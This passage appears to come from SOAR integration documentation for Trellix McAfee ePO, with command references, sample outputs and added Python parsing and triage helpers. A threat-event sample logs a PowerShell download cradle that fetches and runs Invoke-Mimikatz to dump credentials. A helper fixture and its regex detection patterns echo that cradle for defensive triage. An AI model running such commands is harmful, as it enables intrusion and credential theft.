alse,\\\"downloadCredUsername\\\":\\\"\\\",\\\"includeAllSoftware\\\":true,\\\"repositoryId\\\":\\\"ePO_McAfeeEPO510\\\",\\\"repositoryType\\\":2,\\\"location\\\":\\\"McAfeeEPO510/Software\\\",\\\"updateExclusionList\\\":true,\\\"spipeServerIP\\\":\\\"192.168.87.109\\\",\\\"uploadCredPassword\\\":\\\"\\\",\\\"fallback\\\":false,\\\"repliPasswordEncrypted\\\":true}]\\r\\n\"",
    "disableV1DATReplication": "\"[\\r\\n \\r\\n  false\\r\\n \\r\\n ]\"",
    "location": "\"[\\r\\n \\r\\n  \\\"*****-AD/Software\\\"\\r\\n \\r\\n ]\"",
    "protocolString": "\"[\\r\\n \\r\\n  \\\"SpipeSite\\\"\\r\\n \\r\\n ]\"",
    "repositoryId": "\"[\\r\\n \\r\\n  \\\"*****-AD\\\"\\r\\n \\r\\n ]\"",
    "repositoryName": "\"[\\r\\n \\r\\n  \\\"*****-AD\\\"\\r\\n \\r\\n ]\"",
    "repositoryPort": "\"[\\r\\n \\r\\n  80\\r\\n \\r\\n ]\"",
    "repositoryType": "\"[\\r\\n \\r\\n  2\\r\\n \\r\\n ]\"",
    "spipeServerIP": "\"[\\r\\n \\r\\n  \\\"1.1.1.1\\\"\\r\\n \\r\\n ]\"",
    "spipeServerName": "\"[\\r\\n \\r\\n  \\\"*****-AD\\\"\\r\\n \\r\\n ]\"",
    "spipeVersion": "\"[\\r\\n \\r\\n  \\\"4.5.0\\\"\\r\\n \\r\\n ]\""
}
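Key Fields values in the samples on this page are JSON text wrapped in one or two further layers of string encoding, so a playbook step has to unwrap them before use. The following Python is an added example, not D3 or Trellix code; `unwrap`, `decode_key_fields` and `valid_ips` are hypothetical helper names, and the sample text is constructed from the Key Fields samples shown on this page.

```python
import ipaddress
import json

# Constructed sample: keys and value shapes copied from the Key Fields
# samples on this page. The raw string keeps every backslash as displayed.
SAMPLE_KEY_FIELDS = r'''
{
    "CurrentDATVersion": "\"9534.0000\"",
    "repositoryPort": "\"[\\r\\n \\r\\n  80\\r\\n \\r\\n ]\"",
    "spipeServerIP": "\"[\\r\\n \\r\\n  \\\"1.1.1.1\\\"\\r\\n \\r\\n ]\"",
    "SourceUserName": "\"[\\r\\n  \\\"\\\",\\r\\n  \\\"\\\"\\r\\n ]\""
}
'''

MAX_LAYERS = 4  # assumption: refuse to unwrap deeper nesting than this


def unwrap(value):
    """Peel string-encoded JSON layers off a single Key Fields value.

    Only text that starts with a quote, '[' or '{' is decoded again, so a
    bare version string such as 9534.0000 is not coerced into a float.
    """
    for _ in range(MAX_LAYERS):
        if not isinstance(value, str):
            return value
        text = value.strip()
        if not text or text[0] not in '"[{':
            return value
        try:
            value = json.loads(text)
        except json.JSONDecodeError:
            return value  # not encoded JSON after all; keep the text as is
    return value


def decode_key_fields(key_fields_text):
    """Return {field: decoded value} for a Key Fields JSON document."""
    return {name: unwrap(raw) for name, raw in json.loads(key_fields_text).items()}


def valid_ips(values):
    """Keep only syntactically valid IP strings before they feed another command."""
    good = []
    for item in values if isinstance(values, list) else [values]:
        if not isinstance(item, str):
            continue  # ip_address(80) would silently become 0.0.0.80
        try:
            good.append(str(ipaddress.ip_address(item)))
        except ValueError:
            continue
    return good


if __name__ == "__main__":
    fields = decode_key_fields(SAMPLE_KEY_FIELDS)
    for name, value in fields.items():
        print(f"{name}: {value!r}")
    print("scan targets:", valid_ips(fields["spipeServerIP"]))
```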
Return Data

Indicates one of the possible command execution states: Successful or Failed.

The Failed state can be triggered by any of the following errors:

  • A connection issue with the integration

  • The API returned an error message

  • No response from the API

You can view more details about an error in the Error tab.

Return Data can be passed down directly to a subsequent command or used to create conditional tasks in playbooks.

SAMPLE DATA

CODE
Successful
Result

Provides a brief summary of outputs in an HTML formatted table.

SAMPLE DATA

SAServerDNS

disableV1DATReplication

spipeServerDNS

repositoryTypeString

useAnonCreds

downloadCredPassword

downloadCredDomain

lockType

enabled

uncUseLoggedOnUser

uncOrder

protocol

lockedBy

softwareInclusionList

uploadCredUsername

spipeVersion

SAServerNetbios

protocolString

disableFullDATReplication

replicationUNC

SAServerIP

addressType

autoID

softwareExclusionList

repositoryTypeAsString

repositoryName

spipeServerName

uploadCredDomain

repositoryPort

downloadPasswordEncrypted

httpUseAuth

downloadCredUsername

includeAllSoftware

repositoryId

repositoryType

location

updateExclusionList

spipeServerIP

uploadCredPassword

fallback

repliPasswordEncrypted

False

master

False

0

True

False

1

1

[]

4.5.0

SpipeSite

False

3

***-AD

***-AD

80

True

False

True

***-AD

2

***-AD/Software

True

1.1.1.1

False

Tru

Error Handling

If the Return Data is Failed, an Error tab will appear in the Test Result window.

The Error tab contains the details returned by D3 SOAR or third-party API calls, including Failure Indicator, Status Code, and Message. This can help you locate the root cause of a command failure.

Parts in Error

Description

Example

Failure Indicator

Indicates the command failure that happened at a specific input and/or API call.

Repo List failed.

Status Code

The response code issued by the third-party API server or the D3 SOAR system that can be used to locate the corresponding error category. For example, if the returned status code is 401, the selected connection is unauthorized to run the command. The user or system support would need to check the permission setting in the Trellix McAfee ePO portal. Refer to the HTTP Status Code Registry for details.

Status Code: 401.

Message

The raw data or captured key error message from the integration API server about the API request failure.

Message: Unauthorized.

Error Sample Data

Repo List failed.

Status Code: 401.

Message: Unauthorized.

Retrieve Current DAT Version

Retrieves the current DAT version.

Input

N/A

Output

Raw Data

The primary response data from the API request.

SAMPLE DATA

JSON
{
    "CurrentDATVersion": "9534.0000"
}
Context Data

The data extracted from Raw Data converted into JSON format. Context Data may be identical to Raw Data in some cases.

It is recommended to refer to the Raw Data instead of Context Data, since it contains the complete API response data. D3 will deprecate Context Data in the future, and playbook tasks using Context Data will be replaced with Raw Data.

SAMPLE DATA

CODE
{
    "CurrentDATVersion": "9534.0000"
}
Key Fields

Common cyber security indicators such as unique IDs, file hash values, CVE numbers, IP addresses, etc., will be extracted from Raw Data as Key Fields.
The system stores these key fields in the path $.[playbookTask].outputData. You can use these key-value pairs as data points for playbook task inputs.

SAMPLE DATA

CODE
{
    "CurrentDATVersion": "\"9534.0000\""
}
Return Data

Indicates one of the possible command execution states: Successful or Failed.

The Failed state can be triggered by any of the following errors:

  • A connection issue with the integration

  • The API returned an error message

  • No response from the API

You can view more details about an error in the Error tab.

Return Data can be passed down directly to a subsequent command or used to create conditional tasks in playbooks.

SAMPLE DATA

CODE
Successful
Result

Provides a brief summary of outputs in an HTML formatted table.

SAMPLE DATA

CurrentDATVersion

9534.0000

Error Handling

If the Return Data is Failed, an Error tab will appear in the Test Result window.

The Error tab contains the details returned by D3 SOAR or third-party API calls, including Failure Indicator, Status Code, and Message. This can help you locate the root cause of a command failure.

Parts in Error

Description

Example

Failure Indicator

Indicates the command failure that happened at a specific input and/or API call.

Retrieve Current DAT Version failed.

Status Code

The response code issued by the third-party API server or the D3 SOAR system that can be used to locate the corresponding error category. For example, if the returned status code is 401, the selected connection is unauthorized to run the command. The user or system support would need to check the permission setting in the Trellix McAfee ePO portal. Refer to the HTTP Status Code Registry for details.

Status Code: 401.

Message

The raw data or captured key error message from the integration API server about the API request failure.

Message: Unauthorized.

Error Sample Data

Retrieve Current DAT Version failed.

Status Code: 401.

Message: Unauthorized.

Run Client Task

Runs a client task on Trellix McAfee ePO systems.

Input

Input Parameter

Required/Optional

Description

Example

System Names

Required

The names of the systems to run the client task on.

["***-***"]

Product ID

Required

The product ID of the client task to run.

ENDP_***

Task ID

Required

The task ID of the client task to run.

49

Output

Raw Data

The primary response data from the API request.

SAMPLE DATA

JSON
[
    {
        "systemName": "***-***",
        "Status": "Succeeded"
    }
]
Context Data

The data extracted from Raw Data converted into JSON format. Context Data may be identical to Raw Data in some cases.

It is recommended to refer to the Raw Data instead of Context Data, since it contains the complete API response data. D3 will deprecate Context Data in the future, and playbook tasks using Context Data will be replaced with Raw Data.

SAMPLE DATA

CODE
[
    {
        "systemName": "***-***",
        "Status": "Succeeded"
    }
]
Key Fields

Common cyber security indicators such as unique IDs, file hash values, CVE numbers, IP addresses, etc., will be extracted from Raw Data as Key Fields.
The system stores these key fields in the path $.[playbookTask].outputData. You can use these key-value pairs as data points for playbook task inputs.

SAMPLE DATA

CODE
{
    "systemNames": "\"***-***\"",
    "Status": "\"Succeeded\""
}
Return Data

Indicates one of the possible command execution states: Successful, Partially Successful, or Failed.

The Partially Successful state only occurs when a command’s input accepts an array of items (e.g. an array of IP addresses) and one or more items within the array return an error from the API request.

The Failed state can be triggered by any of the following errors:

  • A connection issue with the integration

  • The API returned an error message

  • No response from the API

You can view more details about an error in the Error tab.

Return Data can be passed down directly to a subsequent command or used to create conditional tasks in playbooks.

SAMPLE DATA

CODE
Successful
Result

Provides a brief summary of outputs in an HTML formatted table.

SAMPLE DATA

systemName

Status

***-***

Succeeded

Error Handling

If the Return Data is Partially Successful or Failed, an Error tab will appear in the Test Result window.

The Error tab contains the details returned by D3 SOAR or third-party API calls, including Failure Indicator, Status Code, and Message. This can help you locate the root cause of a command failure.

Parts in Error

Description

Example

Failure Indicator

Indicates the command failure that happened at a specific input and/or API call.

Run Client Task failed.

Status Code

The response code issued by the third-party API server or the D3 SOAR system that can be used to locate the corresponding error category. For example, if the returned status code is 401, the selected connection is unauthorized to run the command. The user or system support would need to check the permission setting in the Trellix McAfee ePO portal. Refer to the HTTP Status Code Registry for details.

Status Code: 401.

Message

The raw data or captured key error message from the integration API server about the API request failure.

Message: Unauthorized.

Error Sample Data

Run Client Task failed.

Status Code: 401.

Message: Unauthorized.

Scan End Point By IP

Scans endpoints based on the provided IP addresses.

Input

Input Parameter

Required/Optional

Description

Example

IP Addresses

Optional

The IP addresses of the endpoints to scan.

["1.1.1.1"]

Scan Type

Optional

The option to perform a quick scan or a full scan.

quickscan

Output

Raw Data

The primary response data from the API request.

SAMPLE DATA

JSON
[
    {
        "1.1.1.1": {
            "status": "Succeeded"
        }
    }
]
Context Data

The data extracted from Raw Data converted into JSON format. Context Data may be identical to Raw Data in some cases.

It is recommended to refer to the Raw Data instead of Context Data, since it contains the complete API response data. D3 will deprecate Context Data in the future, and playbook tasks using Context Data will be replaced with Raw Data.

SAMPLE DATA

CODE
[
    {
        "1.1.1.1": {
            "status": "Succeeded"
        }
    }
]
Return Data

Indicates one of the possible command execution states: Successful, Partially Successful, or Failed.

The Partially Successful state only occurs when a command’s input accepts an array of items (e.g. an array of IP addresses) and one or more items within the array return an error from the API request.

The Failed state can be triggered by any of the following errors:

  • A connection issue with the integration

  • The API returned an error message

  • No response from the API

You can view more details about an error in the Error tab.

Return Data can be passed down directly to a subsequent command or used to create conditional tasks in playbooks.

SAMPLE DATA

CODE
Successful
Result

Provides a brief summary of outputs in an HTML formatted table.

SAMPLE DATA

1.1.1.1

{

"status": "Succeeded"

}

Error Handling

If the Return Data is Partially Successful or Failed, an Error tab will appear in the Test Result window.

The Error tab contains the details returned by D3 SOAR or third-party API calls, including Failure Indicator, Status Code, and Message. This can help you locate the root cause of a command failure.

Parts in Error

Description

Example

Failure Indicator

Indicates the command failure that happened at a specific input and/or API call.

Scan End Point By IP failed.

Status Code

The response code issued by the third-party API server or the D3 SOAR system that can be used to locate the corresponding error category. For example, if the returned status code is 401, the selected connection is unauthorized to run the command. The user or system support would need to check the permission setting in the Trellix McAfee ePO portal. Refer to the HTTP Status Code Registry for details.

Status Code: 404.

Message

The raw data or captured key error message from the integration API server about the API request failure.

Message: No endpoints found.

Error Sample Data

Scan End Point By IP failed.

Status Code: 404.

Message: No endpoints found.

Scan End Points By Group Name

Scans endpoints based on the provided group name.

Input

Input Parameter

Required/Optional

Description

Example

Group Name

Required

The name of the group whose endpoints will be scanned.

AD Domain Controllers

Scan Type

Optional

The option to perform a quick scan or a full scan.

quickscan

Output

Raw Data

The primary response data from the API request.

SAMPLE DATA

JSON
{
    "status": "Succeeded"
}
Context Data

The data extracted from Raw Data converted into JSON format. Context Data may be identical to Raw Data in some cases.

It is recommended to refer to the Raw Data instead of Context Data, since it contains the complete API response data. D3 will deprecate Context Data in the future, and playbook tasks using Context Data will be replaced with Raw Data.

SAMPLE DATA

CODE
{
    "status": "Succeeded"
}
Key Fields

Common cyber security indicators such as unique IDs, file hash values, CVE numbers, IP addresses, etc., will be extracted from Raw Data as Key Fields.
The system stores these key fields in the path $.[playbookTask].outputData. You can use these key-value pairs as data points for playbook task inputs.

SAMPLE DATA

CODE
{
    "status": "\"Succeeded\""
}
Return Data

Indicates one of the possible command execution states: Successful or Failed.

The Failed state can be triggered by any of the following errors:

  • A connection issue with the integration

  • The API returned an error message

  • No response from the API

You can view more details about an error in the Error tab.

Return Data can be passed down directly to a subsequent command or used to create conditional tasks in playbooks.

SAMPLE DATA

CODE
Successful
Result

Provides a brief summary of outputs in an HTML formatted table.

SAMPLE DATA

status

Succeeded

Error Handling

If the Return Data is Failed, an Error tab will appear in the Test Result window.

The Error tab contains the details returned by D3 SOAR or third-party API calls, including Failure Indicator, Status Code, and Message. This can help you locate the root cause of a command failure.

Parts in Error

Description

Example

Failure Indicator

Indicates the command failure that happened at a specific input and/or API call.

Scan End Points By Group Name failed.

Status Code

The response code issued by the third-party API server or the D3 SOAR system that can be used to locate the corresponding error category. For example, if the returned status code is 401, the selected connection is unauthorized to run the command. The user or system support would need to check the permission setting in the Trellix McAfee ePO portal. Refer to the HTTP Status Code Registry for details.

Status Code: 404.

Message

The raw data or captured key error message from the integration API server about the API request failure.

Message: No groups found. Please check the group name you entered.

Error Sample Data

Scan End Points By Group Name failed.

Status Code: 404.

Message: No groups found. Please check the group name you entered.

Scan End Points By Tag Name

Scans endpoints based on the provided tag names.

Reader Note

Tag Name is a required parameter to run this command.

  • Run the Find Tag command to obtain Tag Name. Tag Names can be found in the returned raw data at the path $[*].tagName.

Input

Input Parameter

Required/Optional

Description

Example

Tag Name

Optional

The name of the tag whose tagged endpoints will be scanned. Tag Name can be obtained using the Find Tag command.

Server

Scan Type

Optional

The option to perform a quick scan or a full scan.

quickscan

Output

Raw Data

The primary response data from the API request.

SAMPLE DATA

JSON
{
    "status": "Succeeded"
}
Context Data

The data extracted from Raw Data converted into JSON format. Context Data may be identical to Raw Data in some cases.

It is recommended to refer to the Raw Data instead of Context Data, since it contains the complete API response data. D3 will deprecate Context Data in the future, and playbook tasks using Context Data will be replaced with Raw Data.

SAMPLE DATA

CODE
{
    "status": "Succeeded"
}
Key Fields

Common cyber security indicators such as unique IDs, file hash values, CVE numbers, IP addresses, etc., will be extracted from Raw Data as Key Fields.
The system stores these key fields in the path $.[playbookTask].outputData. You can use these key-value pairs as data points for playbook task inputs.

SAMPLE DATA

CODE
{
    "status": "\"Succeeded\""
}
Return Data

Indicates one of the possible command execution states: Successful or Failed.

The Failed state can be triggered by any of the following errors:

  • A connection issue with the integration

  • The API returned an error message

  • No response from the API

You can view more details about an error in the Error tab.

Return Data can be passed down directly to a subsequent command or used to create conditional tasks in playbooks.

SAMPLE DATA

CODE
Successful
Result

Provides a brief summary of outputs in an HTML formatted table.

SAMPLE DATA

status

Succeeded

Error Handling

If the Return Data is Failed, an Error tab will appear in the Test Result window.

The Error tab contains the details returned by D3 SOAR or third-party API calls, including Failure Indicator, Status Code, and Message. This can help you locate the root cause of a command failure.

Parts in Error

Description

Example

Failure Indicator

Indicates the command failure that happened at a specific input and/or API call.

Scan End Points By Tag Name failed.

Status Code

The response code issued by the third-party API server or the D3 SOAR system that can be used to locate the corresponding error category. For example, if the returned status code is 401, the selected connection is unauthorized to run the command. The user or system support would need to check the permission setting in the Trellix McAfee ePO portal. Refer to the HTTP Status Code Registry for details.

Status Code: 401.

Message

The raw data or captured key error message from the integration API server about the API request failure.

Message: Unauthorized.

Error Sample Data

Scan End Points By Tag Name failed.

Status Code: 401.

Message: Unauthorized.

Search Threat Events

Searches for threat events based on the specified criteria.

Input

Input Parameter

Required/Optional

Description

Example

Endpoints

Optional

The hostnames or IP addresses of the endpoints to search for threat events.

["1.1.1.1"]

Start Time

Optional

The start time of the time range to filter searched threat events, in UTC time.

2019-11-21 00:00

End Time

Optional

The end time of the time range to filter searched threat events, in UTC time.

2019-11-23 00:00

Limit

Optional

The maximum number of results to return.

4

Output

Raw Data

The primary response data from the API request.

SAMPLE DATA

JSON
[
    {
        "AutoGUID": "***-***-***-***-***",
        "TargetFileName": null,
        "SourceParentProcessName": null,
        "SourceDescription": "\"C:\\Windows\\***\\WindowsPowerShell\\v1.0\\powershell.exe\" -exec bypass -command \"IEX (New-Object Net.WebClient).DownloadString('http:////40.112.133.5//Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds \" >c:\\windows\\out2.txt",
        "SourceIPV4": "1.1.1.1",
        "SourceProcessName": "C:\\Windows\\***\\WindowsPowerShell\\v1.0\\powershell.exe",
        "TargetPort": null,
        "SourceFilePath": null,
        "ReceivedUTC": "2019-11-22T15:11:02-08:00",
        "DetectedUTC": "2019-11-22T15:09:10-08:00",
        "AnalyzerName": "McAfee Endpoint Security",
        "AnalyzerVersion": "10.6.1",
        "AnalyzerHostName": "***-***",
        "AnalyzerIPV4": "1.1.1.1",
        "AnalyzerIPV6": "0:0:0:0:0:FFFF:C0A0:0E0",
        "AnalyzerMAC": "*****",
        "AnalyzerDATVersion": "3898.0",
        "AnalyzerEngineVersion": null,
        "AnalyzerDetectionMethod": "AMSI",
        "SourceHostName": "***-***",
        "SourceIPV6": "0:0:0:0:0:FFFF:C0A0:0E0",
        "SourceMAC": null,
        "SourceUserName": null,
        "SourceURL": null,
        "TargetHostName": "***-***",
        "TargetIPV4": "1.1.1.1",
        "TargetIPV6": "0:0:0:0:0:FFFF:C0A0:0E0",
        "TargetMAC": null,
        "TargetUserName": "*****",
        "TargetProtocol": null,
        "TargetProcessName": null,
        "ThreatEventID": *****,
        "ThreatSeverity": 2,
        "ThreatName": "PS/*****",
        "ThreatType": "*****",
        "ThreatActionTaken": "*****",
        "ThreatHandled": false,
        "SourcePort": null,
        "SourceProcessHash": null
    }
]
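The sample `DetectedUTC` value above carries a `-08:00` offset while the Start Time and End Time inputs are given in UTC, so results should be normalized before they are compared with the search window or with other log sources. The following Python is an added example, not D3 or Trellix code: it normalizes the timestamps, puts unhandled events first and flags download-cradle traits in `SourceDescription`; the events, the `triage` helper and the indicator patterns are constructed for illustration.

```python
import json
import re
from datetime import datetime, timezone

# Constructed events: field names follow the Raw Data sample above; the IDs,
# host names and the 198.51.100.7 address (a documentation range) are made up.
SAMPLE_RAW = r'''
[
  {"ThreatEventID": 1001, "ThreatName": "PS/Example", "ThreatHandled": false,
   "DetectedUTC": "2019-11-22T15:09:10-08:00", "TargetHostName": "HOST-A",
   "SourceDescription": "powershell.exe -exec bypass -command \"IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/script.ps1')\""},
  {"ThreatEventID": 1002, "ThreatName": "PS/Example", "ThreatHandled": true,
   "DetectedUTC": "2019-11-22T15:08:43-08:00", "TargetHostName": "HOST-B",
   "SourceDescription": null},
  {"ThreatEventID": 1003, "ThreatName": "PS/Example", "ThreatHandled": false,
   "DetectedUTC": "2019-11-22T16:30:00-08:00", "TargetHostName": "HOST-C",
   "SourceDescription": null}
]
'''

# Command-line traits worth flagging in SourceDescription (defensive heuristics).
INDICATORS = {
    "execution_policy_bypass": re.compile(r"-(?:exec|executionpolicy|ep)\s+bypass", re.I),
    "download_string": re.compile(r"DownloadString\s*\(", re.I),
    "invoke_expression": re.compile(r"\b(?:IEX|Invoke-Expression)\b", re.I),
}
URL = re.compile(r"https?://[^\s'\")]+", re.I)


def parse_window(text):
    """Parse a Start Time / End Time input such as '2019-11-21 00:00' as UTC."""
    return datetime.strptime(text, "%Y-%m-%d %H:%M").replace(tzinfo=timezone.utc)


def to_utc(stamp):
    """Convert an ISO 8601 timestamp with an offset to an aware UTC datetime."""
    parsed = datetime.fromisoformat(stamp)
    if parsed.tzinfo is None:  # assumption: offset-less values are already UTC
        parsed = parsed.replace(tzinfo=timezone.utc)
    return parsed.astimezone(timezone.utc)


def triage(raw_json, start, end):
    """Return findings inside [start, end] (UTC), unhandled events first."""
    lo, hi = parse_window(start), parse_window(end)
    findings = []
    for event in json.loads(raw_json):
        detected = to_utc(event["DetectedUTC"])
        if not lo <= detected <= hi:
            continue  # outside the window once the offset is applied
        description = event.get("SourceDescription") or ""
        findings.append({
            "event_id": event.get("ThreatEventID"),
            "host": event.get("TargetHostName"),
            "threat": event.get("ThreatName"),
            "detected_utc": detected.isoformat(),
            "handled": bool(event.get("ThreatHandled")),
            "indicators": sorted(n for n, rx in INDICATORS.items() if rx.search(description)),
            "urls": URL.findall(description),
        })
    findings.sort(key=lambda f: (f["handled"], f["detected_utc"]))
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_RAW, "2019-11-21 00:00", "2019-11-23 00:00"):
        print(finding)
```

Event 1003 is dated 22 November in local time but falls after the End Time once converted to UTC, so it is excluded from the window.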
Context Data

The data extracted from Raw Data converted into JSON format. Context Data may be identical to Raw Data in some cases.

It is recommended to refer to the Raw Data instead of Context Data, since it contains the complete API response data. D3 will deprecate Context Data in the future, and playbook tasks using Context Data will be replaced with Raw Data.

SAMPLE DATA

CODE
[
    {
        "ThreatName": "PS/*****",
        "ThreatSeverity": 2,
        "DetectedUTC": "2019-11-22T15:09:10-08:00",
        "SourceIPV4": "1.1.1.1",
        "TargetIPV4": "1.1.1.1",
        "SourceUserName": null,
        "TargetUserName": "hhuang"
    }
]
Key Fields

Common cyber security indicators such as unique IDs, file hash values, CVE numbers, IP addresses, etc., will be extracted from Raw Data as Key Fields.
The system stores these key fields in the path $.[playbookTask].outputData. You can use these key-value pairs as data points for playbook task inputs.

SAMPLE DATA

CODE
{
    "DetectedUTC": "\"[\\r\\n  \\\"2019-11-22T15:09:10-08:00\\\",\\r\\n  \\\"2019-11-22T15:09:03-08:00\\\",\\r\\n  \\\"2019-11-22T15:08:51-08:00\\\",\\r\\n  \\\"2019-11-22T15:08:43-08:00\\\"\\r\\n ]\"",
    "SourceIPV4": "\"[\\r\\n  \\\"1.1.1.1\\\" ]\"",
    "SourceUserName": "\"[\\r\\n  \\\"\\\",\\r\\n  \\\"\\\",\\r\\n  \\\"\\\",\\r\\n  \\\"\\\"\\r\\n ]\"",
    "TargetIPV4": "\"[\\r\\n  \\\"1.1.1.1\\\",\\r\\n  \\\"1.1.1.1\\\" ]\"",
    "TargetUserName": "\"[\\r\\n  \\\"*****\\\" ]\"",
    "ThreatName": "\"[\\r\\n  \\\"PS/*****\\\" ]\"",
    "ThreatSeverity": "\"[\\r\\n  2,\\r\\n  2,\\r\\n  2,\\r\\n  2\\r\\n ]\""
}
Return Data

Indicates one of the possible command execution states: Successful, Partially Successful, or Failed.

The Partially Successful state only occurs when a command’s input accepts an array of items (e.g. an array of IP addresses) and one or more items within the array return an error from the API request.

The Failed state can be triggered by any of the following errors:

  • A connection issue with the integration

  • The API returned an error message

  • No response from the API

You can view more details about an error in the Error tab.

Return Data can be passed down directly to a subsequent command or used to create conditional tasks in playbooks.

SAMPLE DATA

CODE
Successful
Result

Provides a brief summary of outputs in an HTML formatted table.

SAMPLE DATA

ThreatName

ThreatSeverity

DetectedUTC

SourceIPV4

TargetIPV4

SourceUserName

TargetUserName

PS/*****

2

11/22/2019 3:09:10 PM

1.1.1.1

1.1.1.1

h*****

Error Handling

If the Return Data is Partially Successful or Failed, an Error tab will appear in the Test Result window.

The Error tab contains the details returned by D3 SOAR or third-party API calls, including Failure Indicator, Status Code, and Message. This can help you locate the root cause of a command failure.

Parts in Error

Description

Example

Failure Indicator

Indicates the command failure that happened at a specific input and/or API call.

Search Threat Events failed.

Status Code

The response code issued by the third-party API server or the D3 SOAR system that can be used to locate the corresponding error category. For example, if the returned status code is 401, the selected connection is unauthorized to run the command. The user or system support would need to check the permission setting in the Trellix McAfee ePO portal. Refer to the HTTP Status Code Registry for details.

Status Code: 401.

Message

The raw data or captured key error message from the integration API server about the API request failure.

Message: Unauthorized.

Error Sample Data

Search Threat Events failed.

Status Code: 401.

Message: Unauthorized.

Update Endpoints

Updates the information of an endpoint.

Input

Input Parameter

Required/Optional

Description

Example

Task ID

Required

The task ID associated with the endpoint to update.

19

Endpoint

Required

The endpoint to update.

***-dc

Product ID

Required

The product ID associated with the endpoint to update.

ENDP_***

Retry Attempts

Optional

The maximum number of retry attempts allowed. The default value is 1.

1

Retry Interval

Optional

The retry interval in seconds. The default value is 30.

30

Abort After

Optional

The amount of time in minutes after the initial update to abort if not completed. The default value is 5.

5

Stop After

Optional

The maximum allowed runtime for the task in minutes. The default value is 20.

20

Randomize Interval

Optional

The duration of random spread for task execution in minutes. The default value is 0, meaning the update will be executed immediately.

0

Output

Raw Data

The primary response data from the API request.

SAMPLE DATA

JSON
No Sample Data
Context Data

The data extracted from Raw Data converted into JSON format. Context Data may be identical to Raw Data in some cases.

It is recommended to refer to the Raw Data instead of Context Data, since it contains the complete API response data. D3 will deprecate Context Data in the future, and playbook tasks using Context Data will be replaced with Raw Data.

SAMPLE DATA

CODE
No Sample Data
Return Data

Indicates one of the possible command execution states: Successful or Failed.

The Failed state can be triggered by any of the following errors:

  • A connection issue with the integration

  • The API returned an error message

  • No response from the API

You can view more details about an error in the Error tab.

Return Data can be passed down directly to a subsequent command or used to create conditional tasks in playbooks.

SAMPLE DATA

CODE
Successful
Result

Provides a brief summary of outputs in an HTML formatted table.

SAMPLE DATA

CODE
No Sample Data

Error Handling

If the Return Data is Failed, an Error tab will appear in the Test Result window.

The Error tab contains the details returned by D3 SOAR or third-party API calls, including Failure Indicator, Status Code, and Message. This can help you locate the root cause of a command failure.

Parts in Error

Description

Example

Failure Indicator

Indicates the command failure that happened at a specific input and/or API call.

Update Endpoints failed.

Status Code

The response code issued by the third-party API server or the D3 SOAR system that can be used to locate the corresponding error category. For example, if the returned status code is 401, the selected connection is unauthorized to run the command. The user or system support would need to check the permission setting in the Trellix McAfee ePO portal. Refer to the HTTP Status Code Registry for details.

Status Code: 401.

Message

The raw data or captured key error message from the integration API server about the API request failure.

Message: Unauthorized.

Error Sample Data

Update Endpoints failed.

Status Code: 401.

Message: Unauthorized.

Update Repository

Updates a repository.

Input

Input Parameter

Required/Optional

Description

Example

Source Repository

Required

The source repository to update.

McAfeeHttp

Target Branch

Required

The updated target branch of the repository.

current

Output

Raw Data

The primary response data from the API request.

SAMPLE DATA

JSON
successskipped: current\LMASECORE2000\2.2.0.9309\SpamEngine\0000
	skipped: current\BOCVSE__1000\657\DAT\0000
	skipped: current\AMCORDAT1000\1359.1\DAT\0000
	updated: current\TELECONT1000_EPO\1.20\Update\0000
	updated: current\TELECONT1000\5.18\Content\0000
	skipped: current\VIRUSCAN8700\8.7.0\LangPack\0000
	updated: current\MAR_CONTENT_1000\1.1.0\Update\0409
	skipped: current\VIRUSCAN8800\8.8.0\LangPack\0000
	skipped: current\SUPPMVTCT1000\8.3.0.357\MVTContentUpdate\0000
	skipped: current\PHCONTENMETA\6006\PHContent\0000
	updated: current\VSCANENG1000\6000.8403\Engine\0000
	updated: current\LV2SNENG1000\6000.8403\Engine\0000
	updated: current\MSCANENG1000\6000.8403\Engine\0000
	skipped: current\DBSECDAMMETA\94.3101\DAT\0000
	updated: current\SUPPCLNT1000\4.1.0.0\ServicePack\0409
	skipped: current\MASECORE2000\2.2.0.9309\SpamEngine\0000
	updated: current\MVEDR_R_3000\3.0.0\DAT\0000
	updated: current\EPOAGENT5000META\5.6.3\Update\0000
	updated: current\MARRULES1000\2.4.2\DAT\0000
	skipped: current\DBSECDVMMETA\175.1967\DVMCHECKS\0000
	skipped: current\Findings\1268\FNDContent\0000
	skipped: current\AUENGINEMETA\1293\BMContent\0000
	updated: current\JTICLIENTMETA\1.0.0\Content\0000
	updated: current\ENDPCNT_1000\10.6.0\DAT\0000
	skipped: current\ENCPTCNT6000\8.0.0.9963\DAT\0000
	updated: current\AMCORDAT2000\4008.0\DAT\0000
	updated: current\VSCANDAT1000\9557.0000\DAT\0000
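Update Repository returns plain text rather than JSON, so a playbook that needs to confirm a specific package was refreshed has to parse it. The following Python is an added example, not D3 or Trellix code; the helper names, the meaning given to the five path components, and the choice of `VSCANDAT1000` as the package to compare with the `CurrentDATVersion` value from Retrieve Current DAT Version are assumptions.

```python
import re

# Excerpt of the Update Repository sample output above, rebuilt in the same
# shape: "success" runs straight into the first entry, later entries follow
# on tab-indented lines.
SAMPLE_OUTPUT = "success" + "\n\t".join([
    r"skipped: current\LMASECORE2000\2.2.0.9309\SpamEngine\0000",
    r"skipped: current\AMCORDAT1000\1359.1\DAT\0000",
    r"updated: current\VSCANENG1000\6000.8403\Engine\0000",
    r"updated: current\MAR_CONTENT_1000\1.1.0\Update\0409",
    r"skipped: current\Findings\1268\FNDContent\0000",
    r"updated: current\VSCANDAT1000\9557.0000\DAT\0000",
])

# Matches an entry wherever it sits, so the run-together first entry and the
# single-line rendering in the Result tab parse the same way.
ENTRY = re.compile(r"(skipped|updated):\s*(\S+)")

# Assumption: the five path components are branch, product, version,
# package type and a trailing code; the page does not name them.
FIELDS = ("branch", "product", "version", "package_type", "code")


def parse_update_output(text):
    """Split the output into structured entries; keep anything unexpected."""
    entries, unparsed = [], []
    for action, path in ENTRY.findall(text):
        parts = path.split("\\")
        if len(parts) != len(FIELDS):
            unparsed.append(f"{action}: {path}")
            continue
        entries.append({"action": action, **dict(zip(FIELDS, parts))})
    return {
        "ok": text.lstrip().lower().startswith("success"),
        "entries": entries,
        "unparsed": unparsed,
    }


def version_key(version):
    """Turn '9557.0000' into (9557, 0) so versions compare numerically."""
    return tuple(int(part) for part in version.split("."))


def advanced_past(entries, product, baseline):
    """True if `product` was updated to a version newer than `baseline`."""
    return any(
        e["product"] == product
        and e["action"] == "updated"
        and version_key(e["version"]) > version_key(baseline)
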